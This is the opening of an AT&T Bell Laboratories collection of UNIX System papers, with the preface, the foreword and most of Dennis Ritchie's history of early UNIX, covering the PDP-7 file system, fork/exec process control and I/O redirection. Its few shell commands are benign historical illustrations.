UNIX® System Readings and Applications, Volume II

The UNIX® System

AT&T Bell Laboratories

PRENTICE-HALL, INC., Englewood Cliffs, New Jersey 07632

©1982 American Telephone and Telegraph Company
©1986 AT&T. This 1987 edition published by Prentice-Hall, Inc.
A division of Simon & Schuster
Englewood Cliffs, New Jersey 07632

UNIX® is a registered trademark of AT&T.

The Publisher offers discounts on this book when ordered in bulk quantities. For more information write: Special Sales/College Marketing, Prentice-Hall, Inc., College Technical and Reference Division, Englewood Cliffs, New Jersey 07632.

The author and publisher of this book have used their best efforts in preparing this book. These efforts include the development, research, and testing of the theories and programs to determine their effectiveness. The author and publisher make no warranty of any kind, expressed or implied, with regard to these programs or the documentation contained in this book. The author and publisher shall not be liable in any event for incidental or consequential damages in connection with, or arising out of, the furnishing, performance, or use of these programs.

All rights reserved. No part of this book may be reproduced, in any form or by any means, without permission in writing from the publisher.

Printed in the United States of America.

10 9 8 7 6 5 4 3 2 1

ISBN Q-13- c l3T645-7

Prentice-Hall International (UK) Limited, London
Prentice-Hall of Australia Pty. Limited, Sydney
Prentice-Hall Canada Inc., Toronto
Prentice-Hall Hispanoamericana, S.A., Mexico
Prentice-Hall of India Private Limited, New Delhi
Prentice-Hall of Japan, Inc., Tokyo
Prentice-Hall of Southeast Asia Pte. Ltd., Singapore
Editora Prentice-Hall do Brasil, Ltda., Rio de Janeiro

Contents

Preface vii
    R. L. Martin
Foreword ix
    A. V. Aho
The Evolution of the UNIX Time-sharing System 1
    D. M. Ritchie
Program Design in the UNIX System Environment 18
    R. Pike and B. W. Kernighan
The Blit: A Multiplexed Graphics Terminal 29
    R. Pike
Debugging C Programs With The Blit 54
    T. Cargill
UNIX Operating System Security 69
    F. T. Grampp and R. H. Morris
File Security and the UNIX System Crypt Command 93
    J. A. Reeds and P. J. Weinberger
The Evolution of C — Past and Future 104
    L. Rosler
Data Abstraction in C 119
    B. Stroustrup
Multiprocessor UNIX Systems 151
    M. J. Bach and S. J. Buroff
A UNIX System Implementation for System/370 168
    W. A. Felton, G. L. Miller, and J. M. Milner
UNIX Operating System Porting Experiences 185
    D. E. Bodenstab, T. F. Houghton, K. A. Kelleman, G. Ronkin, and E. P. Schan
The Evolution of UNIX System Performance 207
    J. Feder
Cheap Dynamic Instruction Counting 231
    P. J. Weinberger
Theory and Practice in the Construction of a Working Sort Routine 243
    J. P. Linderman
The Fair Share Scheduler 260
    G. J. Henry
The Virtual Protocol Machine 273
    M. J. Fitton, C. J. Harkness, K. A. Kelleman, P. F. Long, and C. Mee III
A Network of Computers Running the UNIX System 291
    T. E. Fritz, J. E. Hefner, and T. M. Raleigh
A Stream Input-Output System 311
    D. M. Ritchie

AT&T Bell Laboratories Technical Journal
Vol. 63, No. 8, October 1984
Printed in U.S.A.

The UNIX System: Preface

By R. L. MARTIN*

(Manuscript received July 3, 1984)

Major technological breakthroughs, like the transistor, are rare events. These breakthroughs have far-reaching effects on science, business, and, at times, society. The UNIX™ operating system is such a breakthrough. This breakthrough is reflected in its rapid and continuing academic spread and acclaim, as well as its exploding commercial usage. The UNIX operating system presently is used at 1400 universities and colleges around the world.
It is the basis for 70 computer lines covering the microcomputer-to-supercomputer spectrum; there are on the order of 100,000 UNIX systems now in operation, and approximately 100 companies are developing applications based on it. The 1983 Turing Award was presented to Thompson and Ritchie for their invention.

The importance of the UNIX system to AT&T and AT&T's support of it continue to grow. In his preface to the UNIX Time-Sharing System¹ issue of the Journal, T. H. Crowley observed that "the original design of the UNIX system was an elegant piece of work done in the research area, and that design has proven useful in many applications." In AT&T that observation is even truer now than it was in 1978. The UNIX operating system is the backbone development environment for AT&T and is now being used on hundreds of projects by thousands of programmers. The recently announced AT&T 3B family of 32-bit computers is based on UNIX System V.

This Computing Science and Systems issue of the Journal demonstrates two key points. First, the intellectual foundations laid by Thompson and Ritchie are firm footings for continued innovation and advances in computer science. Second, even though the UNIX system is already widely accepted, it is continuously being improved by the company that invented it.

* AT&T Bell Laboratories.

Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted without payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permission. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor.

REFERENCE

1. T. H. Crowley, "The UNIX Time-Sharing System: Preface," B.S.T.J., 57, No. 6, Part 2 (July-August 1978), pp. 1897-8.

AUTHOR

Robert L. Martin, B.S. (Electrical Engineering), 1964, Brown University; M.S. (Electrical Engineering) and D.S. (Computer Science), The Massachusetts Institute of Technology in 1965 and 1967, respectively; AT&T Bell Laboratories, 1967—. Mr. Martin became Head of the Loop Maintenance Operations System department in 1972, Director of the Loop Maintenance Systems Laboratory in 1978, and Director of the Assignment Systems Design Laboratory in 1979. In 1981 he became Executive Director of the Customer Network Operations division. He assumed his present position as Executive Director of the Computer Systems Software division in 1983. Mr. Martin is responsible for UNIX system development. He holds two patents and is the author of numerous technical articles and a textbook. Member, Tau Beta Pi, Sigma Xi.

AT&T Bell Laboratories Technical Journal
Vol. 63, No. 8, October 1984
Printed in U.S.A.

The UNIX System: Foreword

By A. V. AHO*

(Manuscript received June 28, 1984)

This is the second issue of the Technical Journal devoted exclusively to papers on the family of computer operating systems bearing the UNIX trademark of AT&T Bell Laboratories. The UNIX operating system was created in 1969 by K. Thompson and D. M. Ritchie. Its growth since then, in both the commercial world and the research community, has been truly remarkable.

In the commercial world there are 100,000 UNIX systems in operation, and many hundreds of thousands of programmers who have studied the system's commands and its implementation language C. In the research community, dozens of books and thousands of papers have been written about it, and in 1983 Thompson and Ritchie earned the Turing Award for its invention. Virtually every major university throughout the world now uses the UNIX system.

UNIX is an evolving system.
In the Computing Science Research Center at AT&T Bell Laboratories, where it was invented, the system has developed in a series of releases called "editions" or "versions". The paper by Ritchie in this issue describes the birth of the system in this research environment. UNIX System V is available to the commercial world from AT&T in a fully supported form.

* AT&T Bell Laboratories.

Not only has the system provided the computing community a programming environment of unusual simplicity, power, and elegance, it also has fostered a distinctive approach to software design: a problem is attacked by interconnecting a few simple parts, often created by software tools taken off the shelf. This approach to solving software problems is eloquently described in this issue in the paper by Pike and Kernighan.

The remaining papers in this issue of the Technical Journal represent a small sampling of ongoing system-related research and development work at AT&T Bell Laboratories. The papers cover many topics of current concern to the software community.

I. AN INTELLIGENT TERMINAL

In the first of these remaining papers, Pike describes the software architecture of a programmable bitmap graphics terminal called the Blit, which has evolved into the Teletype® Model 5620 terminal. The terminal and its software were designed specifically to interface with the UNIX system.
The terminal allows programmers to interact with a machine in a natural, visual way. As an important case in point, Cargill describes an innovative, mouse-oriented facility for debugging C programs using the terminal.

II. COMPUTER SECURITY

The next two papers address computer security, a subject of considerable importance. The first paper, by Grampp and Morris, discusses administrative steps to improve system security. In the second paper Reeds and Weinberger present some of the analytic measures and countermeasures that have gone into the development of the encryption command on the UNIX system.

III. THE C PROGRAMMING LANGUAGE

In the early 1970's Dennis Ritchie devised the programming language C to implement the system in a higher-level language. Since that time, C has become a major programming language in its own right. Rosler discusses the evolution of C and current efforts to standardize the language. Stroustrup has added SIMULA67-style classes to C to create a modern language, now known as C++, that supports abstract data types in a particularly efficient manner.

IV. PORTABILITY

Because the system was written in the machine-independent language C, it was possible to port the operating system from one machine to another. Before 1977, the system ran only on the PDP-11* computers. In 1977 experiments demonstrated that the system was indeed portable. Since that time, it has been ported to dozens of different machines ranging from microprocessors to supercomputers. The papers by Bach and Buroff, by Felton, Miller, and Milner, and by Bodenstab et al. describe experiences in porting the UNIX system to several different machines including the Intel 8086, the IBM 370, and multiprocessor architectures.

V. PERFORMANCE

The performance of the system and the software that runs on it is of great importance to both users and developers at AT&T Bell Laboratories.
Feder talks about the continuing measures that have been taken to improve the performance of the system as a whole. Weinberger presents an effective tool that enables a user to monitor the performance of programs easily. Linderman talks about steps taken to improve the performance of an important utility program — the sort routine. Linderman's paper illustrates the interaction of theory and practice that has gone into the design and implementation of many UNIX system programs. Henry discusses improving performance by changing the scheduler to allocate time more fairly to different classes of users.

VI. NETWORKING

The last three papers in this issue describe communications between devices and networks of machines running the UNIX system. The paper by Fitton et al. discusses the design of a set of software tools to create portable data communications protocol programs. The paper by Fritz, Hefner, and Raleigh discusses a software environment that was implemented on a network of different machines all running the UNIX system. The final paper by Ritchie describes an elegant new stream input-output system that facilitates communication between the UNIX system and terminals and networks.

The papers in this issue are only a sampling of the broad range of continuing UNIX system work being done at AT&T Bell Laboratories. The system, C language, and the tools have been greeted with considerable enthusiasm and are used increasingly to solve complex software problems. The system is stimulating new computer science research and in turn is benefiting from new advances in computer research. The UNIX system approach to software design is influencing a new generation of programmers and system designers. The people at AT&T Bell Laboratories are proud to be at the forefront of this advance in computing.

* Trademark of Digital Equipment Corporation.

AUTHOR

Alfred V. Aho, B.A.Sc. (Engineering Physics), 1963, University of Toronto; M.A., 1965, and Ph.D., 1967 (Electrical Engineering/Computer Science), Princeton University; AT&T Bell Laboratories, 1966—. Mr. Aho is presently Head, Computing Principles Research department. His research interests include algorithms, compilers, database query languages, and computer science theory. He is a past president of ACM SIGACT and past chairman of the NSF Advisory Panel on Computer Science.

AT&T Bell Laboratories Technical Journal
Vol. 63, No. 8, October 1984
Printed in U.S.A.

The UNIX System: The Evolution of the UNIX Time-sharing System

By D. M. RITCHIE*

This paper presents a brief history of the early development of the UNIX™ operating system. It concentrates on the evolution of the file system, the process-control mechanism, and the idea of pipelined commands. Some attention is paid to social conditions during the development of the system. This paper is reprinted from Lecture Notes on Computer Science, No. 79, Language Design and Programming Methodology, Springer-Verlag, 1980.

I. INTRODUCTION

During the past few years, the UNIX operating system has come into wide use, so wide that its very name has become a trademark of Bell Laboratories. Its important characteristics have become known to many people. It has suffered much rewriting and tinkering since the first publication describing it in 1974,¹ but few fundamental changes. However, UNIX was born in 1969, not 1974, and the account of its development makes a little-known and perhaps instructive story. This paper presents a technical and social history of the evolution of the system.

II. ORIGINS

For computer science at Bell Laboratories, the period 1968-1969 was somewhat unsettled. The main reason for this was the slow, though clearly inevitable, withdrawal of the Labs from the Multics project.
To the Labs computing community as a whole, the problem was the increasing obviousness of the failure of Multics to deliver promptly any sort of usable system, let alone the panacea envisioned earlier. For much of this time, the Murray Hill Computer Center was also running a costly GE 645 machine that inadequately simulated the GE 635. Another shake-up that occurred during this period was the organizational separation of computing services and computing research.

* AT&T Bell Laboratories.

From the point of view of the group that was to be most involved in the beginnings of UNIX (K. Thompson, Ritchie, M. D. McIlroy, J. F. Ossanna), the decline and fall of Multics had a directly felt effect. We were among the last Bell Laboratories holdouts actually working on Multics, so we still felt some sort of stake in its success. More important, the convenient interactive computing service that Multics had promised to the entire community was in fact available to our limited group, at first under the CTSS system used to develop Multics, and later under Multics itself. Even though Multics could not then support many users, it could support us, albeit at exorbitant cost. We didn't want to lose the pleasant niche we occupied, because no similar ones were available; even the time-sharing service that would later be offered under GE's operating system did not exist. What we wanted to preserve was not just a good environment in which to do programming, but a system around which a fellowship could form. We knew from experience that the essence of communal computing, as supplied by remote-access, time-shared machines, is not just to type programs into a terminal instead of a keypunch, but to encourage close communication.

Thus, during 1969, we began trying to find an alternative to Multics. The search took several forms.
Throughout 1969 we (mainly Ossanna, Thompson, Ritchie) lobbied intensively for the purchase of a medium-scale machine for which we promised to write an operating system; the machines we suggested were the DEC PDP-10 computer and the SDS (later Xerox) Sigma 7. The effort was frustrating, because our proposals were never clearly and finally turned down, but yet were certainly never accepted. Several times it seemed we were very near success. The final blow to this effort came when we presented an exquisitely complicated proposal, designed to minimize financial outlay, that involved some outright purchase, some third-party lease, and a plan to turn in a DEC KA-10 processor on the soon-to-be-announced and more capable KI-10. The proposal was rejected, and rumor soon had it that W. O. Baker (then vice-president of Research) had reacted to it with the comment 'Bell Laboratories just doesn't do business this way!'

Actually, it is perfectly obvious in retrospect (and should have been at the time) that we were asking the Labs to spend too much money on too few people with too vague a plan. Moreover, I am quite sure that at that time operating systems were not, for our management, an attractive area in which to support work. They were in the process of extricating themselves not only from an operating system development effort that had failed, but from running the local Computation Center. Thus it may have seemed that buying a machine such as we suggested might lead on the one hand to yet another Multics, or on the other, if we produced something useful, to yet another Comp Center for them to be responsible for.

Besides the financial agitations that took place in 1969, there was technical work also. Thompson, R. H. Canaday, and Ritchie developed, on blackboards and scribbled notes, the basic design of a file system that was later to become the heart of UNIX.
Most of the design was Thompson's, as was the impulse to think about file systems at all, but I believe I contributed the idea of device files. Thompson's itch for creation of an operating system took several forms during this period; he also wrote (on Multics) a fairly detailed simulation of the performance of the proposed file system design and of paging behavior of programs. In addition, he started work on a new operating system for the GE 645, going as far as writing an assembler for the machine and a rudimentary operating system kernel whose greatest achievement, so far as I remember, was to type a greeting message. The complexity of the machine was such that a mere message was already a fairly notable accomplishment, but when it became clear that the lifetime of the 645 at the Labs was measured in months, the work was dropped.

Also during 1969, Thompson developed the game of 'Space Travel.' First written on Multics, then transliterated into Fortran for GECOS (the operating system for the GE, later Honeywell, 635), it was nothing less than a simulation of the movement of the major bodies of the Solar System, with the player guiding a ship here and there, observing the scenery, and attempting to land on the various planets and moons. The GECOS version was unsatisfactory in two important respects: first, the display of the state of the game was jerky and hard to control because one had to type commands at it, and second, a game cost about $75 for CPU time on the big computer. It did not take long, therefore, for Thompson to find a little-used PDP-7 computer with an excellent display processor; the whole system was used as a Graphic-II terminal. He and I rewrote Space Travel to run on this machine.
The undertaking was more ambitious than it might seem; because we disdained all existing software, we had to write a floating-point arithmetic package, the pointwise specification of the graphic characters for the display, and a debugging subsystem that continuously displayed the contents of typed-in locations in a corner of the screen. All this was written in assembly language for a cross-assembler that ran under GECOS and produced paper tapes to be carried to the PDP-7.

Space Travel, though it made a very attractive game, served mainly as an introduction to the clumsy technology of preparing programs for the PDP-7. Soon Thompson began implementing the paper file system (perhaps 'chalk file system' would be more accurate) that had been designed earlier. A file system without a way to exercise it is a sterile proposition, so he proceeded to flesh it out with the other requirements for a working operating system, in particular the notion of processes. Then came a small set of user-level utilities: the means to copy, print, delete, and edit files, and of course a simple command interpreter (shell). Up to this time all the programs were written using GECOS and files were transferred to the PDP-7 on paper tape; but once an assembler was completed the system was able to support itself. Although it was not until well into 1970 that Brian Kernighan suggested the name 'UNIX,' in a somewhat treacherous pun on 'Multics,' the operating system we know today was born.

III. THE PDP-7 UNIX FILE SYSTEM

Structurally, the file system of PDP-7 UNIX was nearly identical to today's. It had

1. An i-list: a linear array of i-nodes each describing a file. An i-node contained less than it does now, but the essential information was the same: the protection mode of the file, its type and size, and the list of physical blocks holding the contents.

2. Directories: a special kind of file containing a sequence of names and the associated i-number.

3. Special files describing devices. The device specification was not contained explicitly in the i-node, but was instead encoded in the number: specific i-numbers corresponded to specific files.

The important file system calls were also present from the start. Read, write, open, creat (sic), close: with one very important exception, discussed below, they were similar to what one finds now. A minor difference was that the unit of I/O was the word, not the byte, because the PDP-7 was a word-addressed machine. In practice this meant merely that all programs dealing with character streams ignored null characters, because null was used to pad a file to an even number of characters. Another minor, occasionally annoying difference was the lack of erase and kill processing for terminals. Terminals, in effect, were always in raw mode. Only a few programs (notably the shell and the editor) bothered to implement erase-kill processing.

In spite of its considerable similarity to the current file system, the PDP-7 file system was in one way remarkably different: there were no path names, and each file-name argument to the system was a simple name (without '/') taken relative to the current directory. Links, in the usual UNIX sense, did exist. Together with an elaborate set of conventions, they were the principal means by which the lack of path names became acceptable. The link call took the form

    link(dir, file, newname)

where dir was a directory file in the current directory, file an existing entry in that directory, and newname the name of the link, which was added to the current directory. Because dir needed to be in the current directory, it is evident that today's prohibition against links to directories was not enforced; the PDP-7 UNIX file system had the shape of a general directed graph.
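The i-node described in item 1 above can be pictured as a small C struct. The sketch below is illustrative only: the field widths, the block-list length, and the particular device i-numbers are invented for the example, not taken from the PDP-7 sources. The one faithful detail is that device files are distinguished purely by i-number, as item 3 states.

```c
#include <stdint.h>

/* Illustrative sketch of a PDP-7-style on-disk i-node: protection mode,
 * type and size, and the list of physical blocks holding the contents.
 * Field widths and the block-list length are invented, not historical. */
#define NBLKS 7                 /* hypothetical per-file block-list length */

struct pdp7_inode {
    uint16_t mode;              /* protection bits and file type */
    uint16_t size;              /* size in words; the PDP-7 was word-addressed */
    uint16_t blocks[NBLKS];     /* physical disk blocks of the contents */
};

/* Devices carried no flag in the i-node itself: certain fixed i-numbers
 * simply *were* the device files.  These i-numbers are invented. */
enum { INUM_TTY0 = 1, INUM_TTY1 = 2, INUM_DISK = 3 };

int is_device_inum(int inum)
{
    return inum == INUM_TTY0 || inum == INUM_TTY1 || inum == INUM_DISK;
}
```

A lookup that encounters one of these i-numbers would dispatch to device code instead of reading the block list; every other i-number is an ordinary file described entirely by its blocks array.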
So that every user did not need to maintain a link to all directories of interest, there existed a directory called dd that contained entries for the directory of each user. Thus, to make a link to file x in directory ken, I might do

    ln dd ken ken
    ln ken x x
    rm ken

This scheme rendered subdirectories sufficiently hard to use as to make them unused in practice. Another important barrier was that there was no way to create a directory while the system was running; all were made during recreation of the file system from paper tape, so that directories were in effect a nonrenewable resource.

The dd convention made the chdir command relatively convenient. It took multiple arguments, and switched the current directory to each named directory in turn. Thus

    chdir dd ken

would move to directory ken. (Incidentally, chdir was spelled ch; why this was expanded when we went to the PDP-11 I don't remember.)

The most serious inconvenience of the implementation of the file system, aside from the lack of path names, was the difficulty of changing its configuration; as mentioned, directories and special files were both made only when the disk was recreated. Installation of a new device was very painful, because the code for devices was spread widely throughout the system; for example there were several loops that visited each device in turn. Not surprisingly, there was no notion of mounting a removable disk pack, because the machine had only a single fixed-head disk.

The operating system code that implemented this file system was a drastically simplified version of the present scheme. One important simplification followed from the fact that the system was not multiprogrammed; only one program was in memory at a time, and control was passed between processes only when an explicit swap took place.
So, for example, there was an iget routine that made a named i-node available, but it left the i-node in a constant, static location rather than returning a pointer into a large table of active i-nodes. A precursor of the current buffering mechanism was present (with about 4 buffers) but there was essentially no overlap of disk I/O with computation. This was avoided not merely for simplicity. The disk attached to the PDP-7 was fast for its time; it transferred one 18-bit word every 2 microseconds. On the other hand, the PDP-7 itself had a memory cycle time of 1 microsecond, and most instructions took 2 cycles (one for the instruction itself, one for the operand). However, indirectly addressed instructions required 3 cycles, and indirection was quite common, because the machine had no index registers. Finally, the DMA controller was unable to access memory during an instruction. The upshot was that the disk would incur overrun errors if any indirectly-addressed instructions were executed while it was transferring. Thus control could not be returned to the user, nor in fact could general system code be executed, with the disk running. The interrupt routines for the clock and terminals, which needed to be runnable at all times, had to be coded in very strange fashion to avoid indirection.

IV. PROCESS CONTROL

By 'process control,' I mean the mechanisms by which processes are created and used; today the system calls fork, exec, wait, and exit implement these mechanisms. Unlike the file system, which existed in nearly its present form from the earliest days, the process control scheme underwent considerable mutation after PDP-7 UNIX was already in use. (The introduction of path names in the PDP-11 system was certainly a considerable notational advance, but not a change in fundamental structure.)

Today, the way in which commands are executed by the shell can be summarized as follows:

1. The shell reads a command line from the terminal.
2. It creates a child process by fork.
3. The child process uses exec to call in the command from a file.
4. Meanwhile, the parent shell uses wait to wait for the child (command) process to terminate by calling exit.
5. The parent shell goes back to step 1.

Processes (independently executing entities) existed very early in PDP-7 UNIX. There were in fact precisely two of them, one for each of the two terminals attached to the machine. There was no fork, wait, or exec. There was an exit, but its meaning was rather different, as will be seen. The main loop of the shell went as follows.

1. The shell closed all its open files, then opened the terminal special file for standard input and output (file descriptors 0 and 1).
2. It read a command line from the terminal.
3. It linked to the file specifying the command, opened the file, and removed the link. Then it copied a small bootstrap program to the top of memory and jumped to it; this bootstrap program read in the file over the shell code, then jumped to the first location of the command (in effect an exec).
4. The command did its work, then terminated by calling exit. The exit call caused the system to read in a fresh copy of the shell over the terminated command, then to jump to its start (and thus in effect to go to step 1).

The most interesting thing about this primitive implementation is the degree to which it anticipated themes developed more fully later. True, it could support neither background processes nor shell command files (let alone pipes and filters); but I/O redirection (via '<' and '>') was soon there; it is discussed below. The implementation of redirection was quite straightforward; in step 3 above the shell just replaced its standard input or output with the appropriate file. Crucial to subsequent development was the implementation of the shell as a user-level program stored in a file, rather than a part of the operating system.
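The modern five-step loop maps almost line-for-line onto the system calls named above. The function below is a minimal sketch of one trip around that loop for an already-parsed command; the function name and error conventions are mine, not the shell's.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* One iteration of the shell's loop: fork a child, exec the command in
 * the child, wait for it in the parent.  Returns the command's exit
 * status, or -1 on error.  (Reading and parsing the line are omitted.) */
int run_command(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;                      /* fork failed */
    if (pid == 0) {                     /* child: become the command */
        execvp(argv[0], argv);
        _exit(127);                     /* reached only if exec failed */
    }
    int status;                         /* parent: wait for the child */
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

A real shell simply wraps this in a read-parse-run loop, which is step 1 and step 5 of the summary above.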
The structure of this process control scheme, with one process per terminal, is similar to that of many interactive systems, for example CTSS, Multics, Honeywell TSS, and IBM TSS and TSO. In general such systems require special mechanisms to implement useful facilities such as detached computations and command files; UNIX at that stage didn't bother to supply the special mechanisms. It also exhibited some irritating, idiosyncratic problems. For example, a newly recreated shell had to close all its open files both to get rid of any open files left by the command just executed and to rescind previous I/O redirection. Then it had to reopen the special file corresponding to its terminal, in order to read a new command line. There was no /dev directory (because no path names); moreover, the shell could retain no memory across commands, because it was reexecuted afresh after each command. Thus a further file system convention was required: each directory had to contain an entry tty for a special file that referred to the terminal of the process that opened it. If by accident one changed into some directory that lacked this entry, the shell would loop hopelessly; about the only remedy was to reboot. (Sometimes the missing link could be made from the other terminal.)

Process control in its modern form was designed and implemented within a couple of days. It is astonishing how easily it fitted into the existing system; at the same time it is easy to see how some of the slightly unusual features of the design are present precisely because they represented small, easily-coded changes to what existed. A good example is the separation of the fork and exec functions. The most common model for the creation of new processes involves specifying a program for the process to execute; in UNIX, a forked process continues to run the same program as its parent until it performs an explicit exec.
The separation of the functions is certainly not unique to UNIX, and in fact it was present in the Berkeley time-sharing system,2 which was well known to Thompson. Still, it seems reasonable to suppose that it exists in UNIX mainly because of the ease with which fork could be implemented without changing much else. The system already handled multiple (i.e., two) processes; there was a process table, and the processes were swapped between main memory and the disk. The initial implementation of fork required only
1. Expansion of the process table
2. Addition of a fork call that copied the current process to the disk swap area, using the already existing swap I/O primitives, and made some adjustments to the process table.
In fact, the PDP-7's fork call required precisely 27 lines of assembly code. Of course, other changes in the operating system and user programs were required, and some of them were rather interesting and unexpected. But a combined fork-exec would have been considerably more complicated, if only because exec as such did not exist; its function was already performed, using explicit I/O, by the shell. The exit system call, which previously read in a new copy of the shell (actually a sort of automatic exec but without arguments), simplified considerably; in the new version a process only had to clean out its process table entry and give up control.

Curiously, the primitives that became wait were considerably more general than the present scheme. A pair of primitives sent one-word messages between named processes:

    smes(pid, message)
    (pid, message) = rmes()

The target process of smes did not need to have any ancestral relationship with the receiver, although the system provided no explicit mechanism for communicating process IDs, except that fork returned to each of the parent and child the ID of its relative. Messages were not queued; a sender delayed until the receiver read the message.
The message facility was used as follows: the parent shell, after creating a process to execute a command, sent a message to the new process by smes; when the command terminated (assuming it did not try to read any messages) the shell's blocked smes call returned an error indication that the target process did not exist. Thus the shell's smes became, in effect, the equivalent of wait. A different protocol, which took advantage of more of the generality offered by messages, was used between the initialization program and the shells for each terminal. The initialization process, whose ID was understood to be 1, created a shell for each of the terminals, and then issued rmes; each shell, when it read the end of its input file, used smes to send a conventional 'I am terminating' message to the initialization process, which recreated a new shell process for that terminal.

I can recall no other use of messages. This explains why the facility was replaced by the wait call of the present system, which is less general, but more directly applicable to the desired purpose. Possibly relevant also is the evident bug in the mechanism: if a command process attempted to use messages to communicate with other processes, it would disrupt the shell's synchronization. The shell depended on sending a message that was never received; if a command executed rmes, it would receive the shell's phony message, and cause the shell to read another input line just as if the command had terminated. If a need for general messages had manifested itself, the bug would have been repaired.

At any rate, the new process control scheme instantly rendered some very valuable features trivial to implement; for example, detached processes (with '&') and recursive use of the shell as a command. Most systems have to supply some sort of special 'batch job submission' facility and a special command interpreter for files distinct from the one used interactively.
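The unqueued, blocking behavior the shell relied on — smes delays its caller until the receiver's rmes has actually taken the word — can be mimicked with a pair of pipes. This is only a simulation of the semantics (the channel-creation helper and its names are mine), not the PDP-7 interface, which addressed processes by ID:

```python
import os
import struct

def message_channel():
    """Return (smes, rmes) with rendezvous semantics: smes blocks
    until the one-word message has actually been read by rmes."""
    data_r, data_w = os.pipe()     # carries the one-word message
    ack_r, ack_w = os.pipe()       # carries the 'I read it' acknowledgment

    def smes(word):
        os.write(data_w, struct.pack("=I", word))
        os.read(ack_r, 1)          # sender delays here until rmes runs

    def rmes():
        (word,) = struct.unpack("=I", os.read(data_r, 4))
        os.write(ack_w, b"!")      # release the blocked sender
        return word

    return smes, rmes
```

With smes and rmes split between two threads or a parent and a forked child, the sender is released only at the moment of receipt, which is exactly the property that let the shell's blocked smes stand in for wait.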
Although the multiple-process idea slipped in very easily indeed, there were some aftereffects that weren't anticipated. The most memorable of these became evident soon after the new system came up and apparently worked. In the midst of our jubilation, it was discovered that the chdir (change current directory) command had stopped working. There was much reading of code and anxious introspection about how the addition of fork could have broken the chdir call. Finally the truth dawned: in the old system chdir was an ordinary command; it adjusted the current directory of the (unique) process attached to the terminal. Under the new system, the chdir command correctly changed the current directory of the process created to execute it, but this process promptly terminated and had no effect whatsoever on its parent shell! It was necessary to make chdir a special command, executed internally within the shell. It turns out that several command-like functions have the same property, for example login.

Another mismatch between the system as it had been and the new process control scheme took longer to become evident. Originally, the read/write pointer associated with each open file was stored within the process that opened the file. (This pointer indicates where in the file the next read or write will take place.) The problem with this organization became evident only when we tried to use command files. Suppose a simple command file contains

    ls
    who

and it is executed as follows:

    sh comfile >output

The sequence of events was
1. The main shell creates a new process, which opens output to receive the standard output and executes the shell recursively.
2. The new shell creates another process to execute ls, which correctly writes on file output and then terminates.
3. Another process is created to execute the next command.
However, the I/O pointer for the output is copied from that of the shell, and it is still 0, because the shell has never written on its output, and I/O pointers are associated with processes. The effect is that the output of who overwrites and destroys the output of the preceding ls command. Solution of this problem required creation of a new system table to contain the I/O pointers of open files independently of the process in which they were opened.

V. I/O REDIRECTION

The very convenient notation for I/O redirection, using the '>' and '<' characters, was not present from the very beginning of the PDP-7 UNIX system, but it did appear quite early. Like much else in UNIX, it was inspired by an idea from Multics. Multics has a rather general I/O redirection mechanism3 embodying named I/O streams that can be dynamically redirected to various devices, files, and even through special stream-processing modules. Even in the version of Multics we were familiar with a decade ago, there existed a command that switched subsequent output normally destined for the terminal to a file, and another command to reattach output to the terminal. Where under UNIX one might say

    ls >xx

to get a listing of the names of one's files in xx, on Multics the notation was

    iocall attach user_output file xx
    list
    iocall attach user_output syn user_i/o

Even though this very clumsy sequence was used often during the Multics days, and would have been utterly straightforward to integrate into the Multics shell, the idea did not occur to us or anyone else at the time. I speculate that the reason it did not was the sheer size of the Multics project: the implementors of the I/O system were at Bell Labs in Murray Hill, while the shell was done at MIT. We didn't consider making changes to the shell (it was their program); correspondingly, the keepers of the shell may not even have known of the usefulness, albeit clumsiness, of iocall.
(The 1969 Multics manual4 lists iocall as an 'author-maintained,' that is, non-standard, command.) Because both the UNIX I/O system and its shell were under the exclusive control of Thompson, when the right idea finally surfaced, it was a matter of an hour or so to implement it.

VI. THE ADVENT OF THE PDP-11

By the beginning of 1970, PDP-7 UNIX was a going concern. Primitive by today's standards, it was still capable of providing a more congenial programming environment than its alternatives. Nevertheless, it was clear that the PDP-7, a machine we didn't even own, was already obsolete, and its successors in the same line offered little of interest. In early 1970 we proposed acquisition of a PDP-11, which had just been introduced by Digital. In some sense, this proposal was merely the latest in the series of attempts that had been made throughout the preceding year. It differed in two important ways. First, the amount of money (about $65,000) was an order of magnitude less than what we had previously asked; second, the charter sought was not merely to write some (unspecified) operating system, but instead to create a system specifically designed for editing and formatting text, what might today be called a 'word-processing system.' The impetus for the proposal came mainly from J. F. Ossanna, who was then and until the end of his life interested in text processing. If our early proposals were too vague, this one was perhaps too specific; at first it too met with disfavor. Before long, however, funds were obtained through the efforts of L. E. McMahon and an order for a PDP-11 was placed in May. The processor arrived at the end of the summer, but the PDP-11 was so new a product that no disk was available until December. In the meantime, a rudimentary, core-only version of UNIX was written using a cross-assembler on the PDP-7.
Most of the time, the machine sat in a corner, enumerating all the closed Knight's tours on a 6×8 chess board — a three-month job.

VII. THE FIRST PDP-11 SYSTEM

Once the disk arrived, the system was quickly completed. In internal structure, the first version of UNIX for the PDP-11 represented a relatively minor advance over the PDP-7 system; writing it was largely a matter of transliteration. For example, there was no multiprogramming; only one user program was present in core at any moment. On the other hand, there were important changes in the interface to the user: the present directory structure, with full path names, was in place, along with the modern form of exec and wait, and conveniences like character-erase and line-kill processing for terminals. Perhaps the most interesting thing about the enterprise was its small size: there were 24K bytes of core memory (16K for the system, 8K for user programs), and a disk with 1K blocks (512K bytes). Files were limited to 64K bytes.

At the time of the placement of the order for the PDP-11, it had seemed natural, or perhaps expedient, to promise a system dedicated to word processing. During the protracted arrival of the hardware, the increasing usefulness of PDP-7 UNIX made it appropriate to justify creating PDP-11 UNIX as a development tool, to be used in writing the more special-purpose system. By the spring of 1971, it was generally agreed that no one had the slightest interest in scrapping UNIX. Therefore, we transliterated the roff text formatter into PDP-11 assembler language, starting from the PDP-7 version that had been transliterated from McIlroy's BCPL version on Multics, which had in turn been inspired by J. Saltzer's runoff program on CTSS. In early summer, editor and formatter in hand, we felt prepared to fulfill our charter by offering to supply a text-processing service to our Patent department for preparing patent applications.
